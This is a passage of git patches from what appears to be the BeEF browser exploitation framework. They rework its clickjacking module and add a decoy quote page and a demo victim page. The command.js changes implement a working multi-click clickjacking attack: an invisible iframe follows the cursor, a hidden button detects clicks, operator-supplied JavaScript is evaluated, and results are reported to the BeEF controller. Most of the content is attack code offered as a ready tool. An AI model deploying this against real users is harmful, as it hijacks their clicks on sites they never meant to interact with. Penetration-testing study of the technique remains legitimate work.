+<div class="wrapper">
+	<div class="quotes">
+		<div class="inner">
+			<h1>Name That Quote</h1>
+			<div class="text">You are a sad strange little man, and you have my pity.</div>
+			<div class="footnote">
+				<a href="javascript:void(0)">Who said it?</a>
+				<span>Buzz Lightyear, Toy Story</span>
+			</div>
+			<a href="javascript:void(0)" class="more-quotes">Another Quote</a>
+		</div>
+	</div>
+</div>
+
+<!-- BEGIN: Overlay on Page Load -->
+<div class="click-thru" id="overlay1">
+	<div>
+		<h2>Click-thru</h2>
+		<p>You must click here to get to the page.</p>
+		<a href="javascript:void(0)" class="close">Okay</a>
+		<a href="javascript:void(0)" style="display:inline-block;margin-left:10px;" class="close">No Thanks</a>
+	</div>
+</div>
+<!-- END: Overlay on Page Load -->
+
+<script type="text/javascript">
+$(document).ready(function(){
+var quotes = [];
+quotes[0] = {title: "Sometimes you gotta crack a few eggs to make an omelet.", footnote: "Charlie, It's Always Sunny In Philadelphia"};
+quotes[1] = {title: "Cats do not abide by the laws of nature.", footnote: "Charlie, It's Always Sunny In Philadelphia"};
+quotes[2] = {title: "We're gonna go America all over their asses!", footnote: "Charlie, It's Always Sunny In Philadelphia"};
+quotes[3] = {title: "You're about as much use as a condom machine in the Vatican.", footnote: "Rimmer, Red Dwarf"}
+quotes[4] = {title: "He may look like an idiot and talk like an idiot but don't let that fool you. He really is an idiot.", footnote: "Groucho Marx as Rufus T. Firefly, Duck Soup"}
+quotes[5] = {title: "You are a sad strange little man, and you have my pity.", footnote: "Buzz Lightyear, Toy Story"}
+$(".more-quotes").live("click", function(){
+	var random = Math.floor(Math.random()*(quotes.length));
+	$(".text").html(quotes[random].title);
+	//It's easy to add arbitrary actions, commented out is an example
+	//$(".footnote > span").html(quotes[random].footnote).hide();
+	//$(".footnote > a").show();
+
+	$(".footnote > span").html(quotes[random].footnote).show();
+	$(".footnote > a").hide();
+});
+$(".footnote > a").live("click", function(){
+	$(this).hide();
+	$(".footnote > span").show()
+});
+
+// select the overlay element - and "make it an overlay"
+$("#overlay1").overlay({
+	top:200,
+	mask:{
+		color:'#000',
+		loadSpeed:200,
+		opacity:0.5
+	},
+	closeOnClick:false,
+	load:true
+});
+
+});
+</script>
+</body>
+</html>
diff --git a/extensions/demos/html/clickjacking/clickjack_victim.html b/extensions/demos/html/clickjacking/clickjack_victim.html
new file mode 100644
index 000000000..4eea6cda1
--- /dev/null
+++ b/extensions/demos/html/clickjacking/clickjack_victim.html
@@ -0,0 +1,9 @@
+<html>
+<body bgcolor="red">
+
+<p>&nbsp;</p>
+<a href="#click1" onclick="javascript:alert('You clicked link1 at '+window.location);">moooooooo</a>
+<p>&nbsp;</p>
+<a href="#click2" onclick="javascript:alert('You clicked link2 at '+window.location);">moooooooo</a>
+</body>
+</html>
diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js
index 70985c019..d3ce04af4 100644
--- a/modules/social_engineering/clickjacking/command.js
+++ b/modules/social_engineering/clickjacking/command.js
@@ -1,6 +1,4 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
 //   Licensed under the Apache License, Version 2.0 (the "License");
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
@@ -14,79 +12,133 @@
 //   limitations under the License.
 //
 beef.execute(function() {
-
-	var offset_top  = "<%= @offset_top %>";
-	var offset_left = "<%= @offset_left %>";
-	var url = "<%= @url %>";
-	var debug = <%= @debug %>;
-
-	if (debug) opacity = 10; else opacity = 0;
-
-	// create container
-	var cjcontainer = document.createElement('div');
-	cjcontainer.id = "cjcontainer";
-	cjcontainer.setAttribute("style", "-moz-opacity:"+opacity);
-	cjcontainer.style.zIndex = 999;
-	cjcontainer.style.border = "none";
-	cjcontainer.style.width = "30px";
-	cjcontainer.style.height = "20px";
-	cjcontainer.style.overflow = "hidden";
-	cjcontainer.style.position = "absolute";
-	cjcontainer.style.opacity = opacity;
-	cjcontainer.style.filter = "alpha(opacity="+opacity+")";
-	cjcontainer.style.cursor = "default";
-	document.body.appendChild(cjcontainer);
-
-	// create iframe
-	var cjiframe = document.createElement('iframe');
-	cjiframe.id = "cjiframe";
-	cjiframe.src = url;
-	cjiframe.scrolling = "no";
-	cjiframe.frameBorder = "0";
-	cjiframe.allowTransparency = "true";
-	cjiframe.style.overflow = "hidden";
-	cjiframe.style.position = "absolute";
-	cjiframe.style.top = offset_top+"px";
-	cjiframe.style.left = offset_left+"px";
-	cjiframe.style.width = "200px";
-	cjiframe.style.height = "100px";
-	cjiframe.style.border = "none";
-	cjiframe.style.cursor = "default";
-	cjcontainer.appendChild(cjiframe);
-
-	// followmouse code by rsnake
-	// http://ha.ckers.org/weird/followmouse.html
-	// modified by bcoles
-	function followmouse(e){
-
-		var xcoord = 0;
-		var ycoord = 0;
-		var gettrailobj = function() {
-			if (document.getElementById)
-				return document.getElementById("cjcontainer").style;
-			else if (document.all)
-				return document.all.container.style;
-		}
-		if (typeof e != "undefined") {
-			xcoord += e.pageX - 10;
-			ycoord += e.pageY - 15;
-		} else if (typeof window.event != "undefined") {
-			xcoord += document.body.scrollLeft + event.clientX; 
-			ycoord += document.body.scrollTop + event.clientY;
-		}
-		var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15;
-		var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight)
-		gettrailobj().left = xcoord + "px";
-		gettrailobj().top  = ycoord + "px";
+	var elems = {
+		outerFrame: "cjFrame",
+		innerFrame: "innerFrame",
+		btn: "persistentFocusBtn"
 	}
 
-	// hook to mousemove event
-	if (window.addEventListener) {
-		window.addEventListener('mousemove', followmouse, false);
-	} else if (window.attachEvent) {
-		window.attachEvent('mousemove', followmouse);
+	var clicked = 0;
+	var src = "<%= @iFrameSrc %>";
+	var secZone = "<%= @iFrameSecurityZone %>";
+	var sandbox = "<%= @iFrameSandbox %>";
+	var visibility = "<%= @iFrameVisibility %>";
+
+	var clicks = [
+		{js:"<%= URI.escape(@clickaction_1) %>", posTop:cleanPos("<%= @iFrameTop_1 %>"), posLeft:cleanPos("<%= @iFrameLeft_1 %>")},
+		{js:"<%= URI.escape(@clickaction_2) %>", posTop:cleanPos("<%= @iFrameTop_2 %>"), posLeft:cleanPos("<%= @iFrameLeft_2 %>")},
+		{js:"<%= URI.escape(@clickaction_3) %>", posTop:cleanPos("<%= @iFrameTop_3 %>"), posLeft:cleanPos("<%= @iFrameLeft_3 %>")},
+		{js:"<%= URI.escape(@clickaction_4) %>", posTop:cleanPos("<%= @iFrameTop_4 %>"), posLeft:cleanPos("<%= @iFrameLeft_4 %>")},
+		{js:"<%= URI.escape(@clickaction_5) %>", posTop:cleanPos("<%= @iFrameTop_5 %>"), posLeft:cleanPos("<%= @iFrameLeft_5 %>")},
+		{js:"<%= URI.escape(@clickaction_6) %>", posTop:cleanPos("<%= @iFrameTop_6 %>"), posLeft:cleanPos("<%= @iFrameLeft_6 %>")},
+		{js:"<%= URI.escape(@clickaction_7) %>", posTop:cleanPos("<%= @iFrameTop_7 %>"), posLeft:cleanPos("<%= @iFrameLeft_7 %>")},
+		{js:"<%= URI.escape(@clickaction_8) %>", posTop:cleanPos("<%= @iFrameTop_8 %>"), posLeft:cleanPos("<%= @iFrameLeft_8 %>")},
+		{js:"void(0);", posTop:'-', posLeft:'-'}
+	]
+
+	var iframeAttrs = {};
+	iframeAttrs.src = src;
+	(secZone == "on") ? iframeAttrs.security = "restricted" : "";
+	(sandbox == "on") ? iframeAttrs.sandbox = "allow-forms" : "";
+
+	var iframeStyles = {};
+	iframeStyles.width = "<%= @iFrameWidth %>px";
+	iframeStyles.height = "<%= @iFrameHeight %>px";
+	iframeStyles.opacity = (visibility == "on") ? "0.6" : "0.0";
+	iframeStyles.filter = (visibility == "on") ? "alpha(opacity=60)" : "alpha(opacity=0)";
+
+	var innerPos = {};
+	//initialize iframe
+	innerPos.top = clicks[0].posTop + "px";
+	innerPos.left = clicks[0].posLeft + "px";
+
+	//returns a negative version of a number, or if NaN returns a dash
+	function cleanPos(coordinate) {
+		var iCoordinate = parseInt(coordinate);
+		if (isNaN(iCoordinate))
+			return "-";
+		else if (iCoordinate > 0)
+			return (-1 * iCoordinate)
+		return iCoordinate
 	}
 
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event');
+	function init(params, styles, stylesInner, callback) {
+		var container = $j.extend(true, {'border':'none', 'position':'absolute', 'z-index':'100000', 'overflow':'hidden'}, styles);
+		var inner = $j.extend(true, {'border':'none', 'position':'absolute', 'width':'2000px', 'height':'10000px'}, stylesInner);
 
+		var containerDiv = $j('<div id="' + elems.outerFrame + '"></div>').css(container).prependTo('body');
+		var containerDiv = $j('<input id="' + elems.btn + '" type="button" value="invisible" style="width:1px;height:1px;opacity:0;alpha(opacity=0)" />').appendTo('body');
+
+		var innerIframe = $j('<iframe id="' + elems.innerFrame + '" scrolling="no" />').attr(params).css(inner).load(callback).prependTo('#' + elems.outerFrame);
+
+		return containerDiv;
+	}
+
+	function step1(){
+		var btnSelector = "#" + elems.btn;
+		var outerSelector = "#" + elems.outerFrame;
+		var btnObj = $(btnSelector);
+		var outerObj = $(outerSelector);
+
+		$(window).mousemove(function(e) {
+			$(outerObj).css('top', e.pageY);
+			$(outerObj).css('left', e.pageX);
+		});
+
+		$(btnObj).focus();
+		$(btnObj).focusout(function() {
+			cjLog("Iframe clicked");
+			iframeClicked();
+		});
+	}
+
+	function iframeClicked(){
+		clicked++;
+		var jsfunc = '';
+		try{
+			//check if there's an action to perform
+			if (isNaN(parseInt(clicks[clicked-1].posTop))) {
+				removeAll(elems);
+				throw "No more clicks.";
+			}
+			jsfunc = clicks[clicked-1].js;
+			innerPos.top = clicks[clicked].posTop;
+			innerPos.left = clicks[clicked].posLeft;
+			eval(unescape(jsfunc));
+			setTimeout(function(){
+				updateIframePosition();
+			}, <%= @clickDelay %>);
+		} catch(e) {
+			cjLog(e);
+		}
+		setTimeout(function(){
+			var btnSelector = "#" + elems.btn;
+			var btnObj = $(btnSelector);
+			$(btnObj).focus();
+		}, 200);
+	}
+
+	function updateIframePosition(){
+		var innerSelector = "#" + elems.innerFrame;
+		var innerObj = $(innerSelector);
+		$(innerObj).css('top', innerPos.top + 'px');
+		$(innerObj).css('left', innerPos.left + 'px');
+	}
+
+	//Remove outerFrame and persistent button
+	function removeAll(){
+		$("#" + elems.outerFrame).remove();
+		$("#" + elems.btn).remove();
+	}
+
+	function cjLog(msg){
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + msg);
+	}
+
+	init(iframeAttrs, iframeStyles, innerPos,
+		function() {
+			step1();
+			cjLog("Iframe successfully created.");
+		}
+	);
 });
diff --git a/modules/social_engineering/clickjacking/config.yaml b/modules/social_engineering/clickjacking/config.yaml
index 0d9d51248..c69230044 100644
--- a/modules/social_engineering/clickjacking/config.yaml
+++ b/modules/social_engineering/clickjacking/config.yaml
@@ -1,6 +1,4 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
 #   Licensed under the Apache License, Version 2.0 (the "License");
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
@@ -19,9 +17,7 @@ beef:
             enable: true
             category: "Social Engineering"
             name: "Clickjacking"
-            description: "This module serves as a template for clickjacking attacks.<br />Simply specify the target URL and the offset (in pixels) for the iframe content. The iframe will follow the mouse cursor.<br />Debug mode creates a visible iframe for testing purposes."
-            authors: ["bcoles"]
+            description: "Allows you to perform basic multi-click clickjacking. The iframe follows the mouse, so anywhere the user clicks on the page will be over x-pos,y-pos. The optional JS configuration values specify local Javascript to exectute when a user clicks, allowing the page can give visual feedback. The attack stops when y-pos is set to a non-numeric values (e.g. a dash). <br /><br />For a demo, visit /demos/clickjacking/clickjack_attack.html with the default settings (based on browser they may have to be adjusted)."
+            authors: ["Brigette Lundeen", "Rich Lundeen"]
             target:
-                user_notify: ["FF", "C"]
-                not_working: ["IE"]
-
+                user_notify: ["FF", "C", "IE"]
diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb
index c005d87c5..d3f5c5d55 100644
--- a/modules/social_engineering/clickjacking/module.rb
+++ b/modules/social_engineering/clickjacking/module.rb
@@ -1,5 +1,4 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
 #
 #   Licensed under the Apache License, Version 2.0 (the "License");
 #   you may not use this file except in compliance with the License.
@@ -14,22 +13,66 @@
 #   limitations under the License.
 #
 class Clickjacking < BeEF::Core::Command
-  
+
 	def self.options
+
 		configuration = BeEF::Core::Configuration.instance
-		uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjack.html"
+		uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjacking/clickjack_victim.html"
+
 		return [
-			{ 'name' => 'url', 'description' => 'Target URL', 'ui_label' => 'Target URL', 'value' => uri, 'width'=>'400px' },
-			{ 'name' => 'offset_top', 'description' => 'Offset Top (in pixels)', 'ui_label' => 'Offset Top (px)', 'value' => '-40', 'width'=>'150px' },
-			{ 'name' => 'offset_left', 'description' => 'Offset Left (in pixels)', 'ui_label' => 'Offset Left (px)', 'value' => '-10', 'width'=>'150px' },
-			{ 'name' => 'debug', 'type' => 'combobox', 'ui_label' => 'Debug Mode', 'store_type' => 'arraystore', 'store_fields' => ['debug'], 'store_data' => [['true'],['false']], 'valueField' => 'debug', 'value' => 'false', editable: false, 'displayField' => 'debug', 'mode' => 'local', 'autoWidth' => true }
-		]
+		{'name' => 'iFrameSrc', 'ui_label'=>'iFrame Src', 'type' => 'textarea', 'value' => uri, 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameSecurityZone', 'ui_label' => 'Security restricted (IE)', 'type' => 'checkbox' },
+		{'name' => 'iFrameSandbox', 'ui_label' => 'Sandbox', 'type' => 'checkbox' },
+		{'name' => 'iFrameVisibility', 'ui_label' => 'Show Attack', 'type' => 'checkbox', 'checked' => 'checked' },
+		{'name' => 'clickDelay', 'ui_label' => 'Click Delay (ms)', 'value' => '300', 'width' => '100px' },
+		{'name' => 'iFrameWidth', 'ui_label' => 'iFrame Width', 'value' => '16', 'width' => '100px' },
+		{'name' => 'iFrameHeight', 'ui_label' => 'iFrame Height', 'value' => '10', 'width' => '100px' },
+
+		{'name' => 'Click_1', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 1' },
+		{'name' => 'clickaction_1', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'$("#overlay1").data("overlay").close();', 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameLeft_1', 'ui_label' => 'X-pos', 'value' => '20', 'width'=>'100px' },
+		{'name' => 'iFrameTop_1', 'ui_label' => 'Y-pos', 'value' => '50', 'width'=>'100px' },
+
+		{'name' => 'Click_2', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 2' },
+		{'name' => 'clickaction_2', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'$(".more-quotes").trigger("click");', 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameLeft_2', 'ui_label' => 'X-pos', 'value' => '20', 'width'=>'100px' },
+		{'name' => 'iFrameTop_2', 'ui_label' => 'Y-pos', 'value' => '123', 'width'=>'100px' },
+
+		{'name' => 'Click_3', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 3' },
+		{'name' => 'clickaction_3', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameLeft_3', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' },
+		{'name' => 'iFrameTop_3', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' },
+
+		{'name' => 'Click_4', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 4' },
+		{'name' => 'clickaction_4', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameLeft_4', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' },
+		{'name' => 'iFrameTop_4', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' },
+
+		{'name' => 'Click_5', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 5' },
+		{'name' => 'clickaction_5', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameLeft_5', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' },
+		{'name' => 'iFrameTop_5', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' },
+
+		{'name' => 'Click_6', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 5' },
+		{'name' => 'clickaction_6', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameLeft_6', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' },
+		{'name' => 'iFrameTop_6', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' },
+
+		{'name' => 'Click_7', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 7' },
+		{'name' => 'clickaction_7', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameLeft_7', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' },
+		{'name' => 'iFrameTop_7', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' },
+
+		{'name' => 'Click_8', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 8' },
+		{'name' => 'clickaction_8', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'},
+		{'name' => 'iFrameLeft_8', 'ui_label' => 'X-pos', 'value' => '-', 'width'=>'100px' },
+		{'name' => 'iFrameTop_8', 'ui_label' => 'Y-pos', 'value' => '-', 'width'=>'100px' }
+
+	]
 	end
 
 	def post_execute
-		content = {}
-		content['clickjack'] = @datastore['clickjack']
-		save content
+		save({'clickjack' => @datastore['clickjack']})
 	end
-  
+
 end

From bcf842587f3e570bce75e4ca94d900fdfe53457e Mon Sep 17 00:00:00 2001
From: Rich Lundeen <richard.lundeen@gmail.com>
Date: Mon, 10 Sep 2012 15:36:57 -0700
Subject: [PATCH 039/397] Fixed several minor bugs

---
 .../html/clickjacking/clickjack_attack.html   |  9 +++--
 .../clickjacking/command.js                   | 34 ++++++++++---------
 .../clickjacking/config.yaml                  |  1 +
 3 files changed, 23 insertions(+), 21 deletions(-)

diff --git a/extensions/demos/html/clickjacking/clickjack_attack.html b/extensions/demos/html/clickjacking/clickjack_attack.html
index 9b09b4275..ef4ce8135 100644
--- a/extensions/demos/html/clickjacking/clickjack_attack.html
+++ b/extensions/demos/html/clickjacking/clickjack_attack.html
@@ -57,6 +57,7 @@ margin-top:40px;
 padding:5px 0;
 }
 .inner .footnote > a{
+/*
 display:inline-block;
 width:100px;
 background:#09C;
@@ -68,10 +69,12 @@ line-height:30px;
 border-radius5px;
 border:1p solid #999;
 text-decoration:none;
+*/
+display:none;
 margin-top:5px;
 }
 .inner .footnote > span{
-display:none;
+/*display:none;*/
 }
 .click-thru{
 color:#333;
@@ -144,10 +147,6 @@ quotes[5] = {title: "You are a sad strange little man, and you have my pity.", f
 $(".more-quotes").live("click", function(){
 	var random = Math.floor(Math.random()*(quotes.length));
 	$(".text").html(quotes[random].title);
-	//It's easy to add arbitrary actions, commented out is an example
-	//$(".footnote > span").html(quotes[random].footnote).hide();
-	//$(".footnote > a").show();
-
 	$(".footnote > span").html(quotes[random].footnote).show();
 	$(".footnote > a").hide();
 });
diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js
index d3ce04af4..b11e81325 100644
--- a/modules/social_engineering/clickjacking/command.js
+++ b/modules/social_engineering/clickjacking/command.js
@@ -95,26 +95,28 @@ beef.execute(function() {
 	function iframeClicked(){
 		clicked++;
 		var jsfunc = '';
-		try{
-			//check if there's an action to perform
-			if (isNaN(parseInt(clicks[clicked-1].posTop))) {
-				removeAll(elems);
-				throw "No more clicks.";
-			}
-			jsfunc = clicks[clicked-1].js;
-			innerPos.top = clicks[clicked].posTop;
-			innerPos.left = clicks[clicked].posLeft;
-			eval(unescape(jsfunc));
-			setTimeout(function(){
-				updateIframePosition();
-			}, <%= @clickDelay %>);
-		} catch(e) {
-			cjLog(e);
-		}
+		jsfunc = clicks[clicked-1].js;
+		innerPos.top = clicks[clicked].posTop;
+		innerPos.left = clicks[clicked].posLeft;
+		eval(unescape(jsfunc));
+		setTimeout(function(){
+			updateIframePosition();
+		}, <%= @clickDelay %>);
+
 		setTimeout(function(){
 			var btnSelector = "#" + elems.btn;
 			var btnObj = $(btnSelector);
 			$(btnObj).focus();
+
+			//check if there are any more actions to perform
+			try {
+				if (isNaN(parseInt(clicks[clicked].posTop))) {
+					removeAll(elems);
+					throw "No more clicks.";
+				}
+			} catch(e) {
+				cjLog(e);
+			}
 		}, 200);
 	}
 
diff --git a/modules/social_engineering/clickjacking/config.yaml b/modules/social_engineering/clickjacking/config.yaml
index c69230044..8243cf0dc 100644
--- a/modules/social_engineering/clickjacking/config.yaml
+++ b/modules/social_engineering/clickjacking/config.yaml
@@ -11,6 +11,7 @@
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
+
 beef:
     module:
         clickjacking:

From 2720a5a8b93c0dd18455d9d520384f0adee92345 Mon Sep 17 00:00:00 2001
From: Rich Lundeen <richard.lundeen@gmail.com>
Date: Tue, 11 Sep 2012 13:09:37 -0700
Subject: [PATCH 040/397] Better reliability in IE

---
 .../demos/html/clickjacking/clickjack_victim.html   | 13 +++++++++----
 modules/social_engineering/clickjacking/command.js  |  4 ++--
 modules/social_engineering/clickjacking/module.rb   |  4 ++--
 3 files changed, 13 insertions(+), 8 deletions(-)

diff --git a/extensions/demos/html/clickjacking/clickjack_victim.html b/extensions/demos/html/clickjacking/clickjack_victim.html
index 4eea6cda1..afd388f90 100644
--- a/extensions/demos/html/clickjacking/clickjack_victim.html
+++ b/extensions/demos/html/clickjacking/clickjack_victim.html
@@ -1,9 +1,14 @@
-<html>
-<body bgcolor="red">
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
+<head>
+	<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
+	<title></title>
+</head>
+<body style="background-color:red">
 
 <p>&nbsp;</p>
-<a href="#click1" onclick="javascript:alert('You clicked link1 at '+window.location);">moooooooo</a>
+<a href="#click1" onclick="javascript:alert('You clicked link1 at '+ window.location);">moooooooo</a>
 <p>&nbsp;</p>
-<a href="#click2" onclick="javascript:alert('You clicked link2 at '+window.location);">moooooooo</a>
+<a href="#click2" onclick="javascript:alert('You clicked link2 at '+ window.location);">moooooooo</a>
 </body>
 </html>
diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js
index b11e81325..b49c0652f 100644
--- a/modules/social_engineering/clickjacking/command.js
+++ b/modules/social_engineering/clickjacking/command.js
@@ -67,7 +67,7 @@ beef.execute(function() {
 		var inner = $j.extend(true, {'border':'none', 'position':'absolute', 'width':'2000px', 'height':'10000px'}, stylesInner);
 
 		var containerDiv = $j('<div id="' + elems.outerFrame + '"></div>').css(container).prependTo('body');
-		var containerDiv = $j('<input id="' + elems.btn + '" type="button" value="invisible" style="width:1px;height:1px;opacity:0;alpha(opacity=0)" />').appendTo('body');
+		var containerDiv = $j('<input id="' + elems.btn + '" type="button" value="invisible" style="width:1px;height:1px;opacity:0;alpha(opacity=0);margin-left:-200px" />').appendTo('body');
 
 		var innerIframe = $j('<iframe id="' + elems.innerFrame + '" scrolling="no" />').attr(params).css(inner).load(callback).prependTo('#' + elems.outerFrame);
 
@@ -80,7 +80,7 @@ beef.execute(function() {
 		var btnObj = $(btnSelector);
 		var outerObj = $(outerSelector);
 
-		$(window).mousemove(function(e) {
+		$("body").mousemove(function(e) {
 			$(outerObj).css('top', e.pageY);
 			$(outerObj).css('left', e.pageX);
 		});
diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb
index d3f5c5d55..653329eb0 100644
--- a/modules/social_engineering/clickjacking/module.rb
+++ b/modules/social_engineering/clickjacking/module.rb
@@ -31,12 +31,12 @@ class Clickjacking < BeEF::Core::Command
 		{'name' => 'Click_1', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 1' },
 		{'name' => 'clickaction_1', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'$("#overlay1").data("overlay").close();', 'width' => '400px', 'height' => '50px'},
 		{'name' => 'iFrameLeft_1', 'ui_label' => 'X-pos', 'value' => '20', 'width'=>'100px' },
-		{'name' => 'iFrameTop_1', 'ui_label' => 'Y-pos', 'value' => '50', 'width'=>'100px' },
+		{'name' => 'iFrameTop_1', 'ui_label' => 'Y-pos', 'value' => '55', 'width'=>'100px' },
 
 		{'name' => 'Click_2', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 2' },
 		{'name' => 'clickaction_2', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'$(".more-quotes").trigger("click");', 'width' => '400px', 'height' => '50px'},
 		{'name' => 'iFrameLeft_2', 'ui_label' => 'X-pos', 'value' => '20', 'width'=>'100px' },
-		{'name' => 'iFrameTop_2', 'ui_label' => 'Y-pos', 'value' => '123', 'width'=>'100px' },
+		{'name' => 'iFrameTop_2', 'ui_label' => 'Y-pos', 'value' => '135', 'width'=>'100px' },
 
 		{'name' => 'Click_3', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 3' },
 		{'name' => 'clickaction_3', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'},

From 0b852dd30897999f55f8869d186a8beec4d8011b Mon Sep 17 00:00:00 2001
From: Rich Lundeen <richard.lundeen@gmail.com>
Date: Tue, 11 Sep 2012 23:17:50 -0700
Subject: [PATCH 041/397] Made namespaces consistent and expanded body

Adding feedback I missed earlier regarding namespaces. Also since
we're using body instead of window (for IE support), expanding the
body so that the mouse follows everywhere.
---
 .../html/clickjacking/clickjack_attack.html   | 10 +++++--
 .../clickjacking/command.js                   | 28 +++++++++----------
 2 files changed, 21 insertions(+), 17 deletions(-)

diff --git a/extensions/demos/html/clickjacking/clickjack_attack.html b/extensions/demos/html/clickjacking/clickjack_attack.html
index ef4ce8135..df86106e6 100644
--- a/extensions/demos/html/clickjacking/clickjack_attack.html
+++ b/extensions/demos/html/clickjacking/clickjack_attack.html
@@ -9,17 +9,18 @@
 
 <style type="text/css">
 body{
+margin:0;
+padding:0;
 color:#fff;
 font-family:'Neuton', georgia, serif;
 background-color:#999;
-width:100%;
-height:100%;
 }
 .quotes{
 width:100%;
 height:100%;
 text-align:center;
-margin:50px 0;
+margin:0 0 50px 0;
+padding-top:50px;
 }
 .quotes .inner{
 width:700px;
@@ -137,6 +138,9 @@ font-size:20px;
 
 <script type="text/javascript">
 $(document).ready(function(){
+$("body").width($(window).width()-10);
+$("body").height($(window).height()-70);
+
 var quotes = [];
 quotes[0] = {title: "Sometimes you gotta crack a few eggs to make an omelet.", footnote: "Charlie, It's Always Sunny In Philadelphia"};
 quotes[1] = {title: "Cats do not abide by the laws of nature.", footnote: "Charlie, It's Always Sunny In Philadelphia"};
diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js
index b49c0652f..14269606f 100644
--- a/modules/social_engineering/clickjacking/command.js
+++ b/modules/social_engineering/clickjacking/command.js
@@ -77,16 +77,16 @@ beef.execute(function() {
 	function step1(){
 		var btnSelector = "#" + elems.btn;
 		var outerSelector = "#" + elems.outerFrame;
-		var btnObj = $(btnSelector);
-		var outerObj = $(outerSelector);
+		var btnObj = $j(btnSelector);
+		var outerObj = $j(outerSelector);
 
-		$("body").mousemove(function(e) {
-			$(outerObj).css('top', e.pageY);
-			$(outerObj).css('left', e.pageX);
+		$j("body").mousemove(function(e) {
+			$j(outerObj).css('top', e.pageY);
+			$j(outerObj).css('left', e.pageX);
 		});
 
-		$(btnObj).focus();
-		$(btnObj).focusout(function() {
+		$j(btnObj).focus();
+		$j(btnObj).focusout(function() {
 			cjLog("Iframe clicked");
 			iframeClicked();
 		});
@@ -105,8 +105,8 @@ beef.execute(function() {
 
 		setTimeout(function(){
 			var btnSelector = "#" + elems.btn;
-			var btnObj = $(btnSelector);
-			$(btnObj).focus();
+			var btnObj = $j(btnSelector);
+			$j(btnObj).focus();
 
 			//check if there are any more actions to perform
 			try {
@@ -122,15 +122,15 @@ beef.execute(function() {
 
 	function updateIframePosition(){
 		var innerSelector = "#" + elems.innerFrame;
-		var innerObj = $(innerSelector);
-		$(innerObj).css('top', innerPos.top + 'px');
-		$(innerObj).css('left', innerPos.left + 'px');
+		var innerObj = $j(innerSelector);
+		$j(innerObj).css('top', innerPos.top + 'px');
+		$j(innerObj).css('left', innerPos.left + 'px');
 	}
 
 	//Remove outerFrame and persistent button
 	function removeAll(){
-		$("#" + elems.outerFrame).remove();
-		$("#" + elems.btn).remove();
+		$j("#" + elems.outerFrame).remove();
+		$j("#" + elems.btn).remove();
 	}
 
 	function cjLog(msg){

From 62768e1ea2c372d2ec0ed35181105813cdfdc43b Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
